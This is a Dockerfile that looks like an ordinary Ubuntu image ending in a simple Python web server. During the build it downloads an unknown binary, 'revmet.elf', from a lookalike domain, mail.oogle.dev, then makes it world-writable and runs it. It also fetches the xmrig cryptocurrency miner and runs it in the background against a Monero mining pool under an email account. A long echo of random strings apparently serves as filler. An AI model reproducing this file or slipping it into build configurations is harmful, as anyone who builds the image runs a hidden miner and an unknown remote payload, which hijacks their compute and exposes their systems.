FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo JUFFaROMfsqmd937WyncvmwiGhzsPXqB 9gsSTkxw5tMkWGJNhsP2JCFPFG6Hbh7M SE9eIw4MdCu8zUMqnmNGVoqWM47mvk8h nTQV2bS2HektHXYDLN5wqz6MsCFvOnBf 6rdYjTwdhDDBtpCoTiqcOoFWAHrqoEzh Rv9rznH6hJfnAblPr7qsd0oYyvTrKsMS CoRrBJlekfKybTglOnUIK6cIInUTYZNI CDWpX7AqakFXjmX89NTWeNrSSixvCuO9 fYoh2jTYnp4WJ5bzpvgQ1OT5BuglAWO0 MW9Bryjy9V7U9O7EYljseZdTuCpEt9bN Jv6vvrsr5DqER03YHdUgBGUbsUOBOqRN NuTyRHMdnVFk4QZeItR9Q4iL7TQiY1w7 oDgX3pWgWo9X8JGEbapJTPOfcvbWYzzr OcvLHTm9AbJFY3O3Vv6ANsxbglJk3jMb JcC2FGfOuUmZde3S5c20NglJOlVecI67 BBvh8a9wArLH6krsPH2kDgnK16iHrJ4u DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]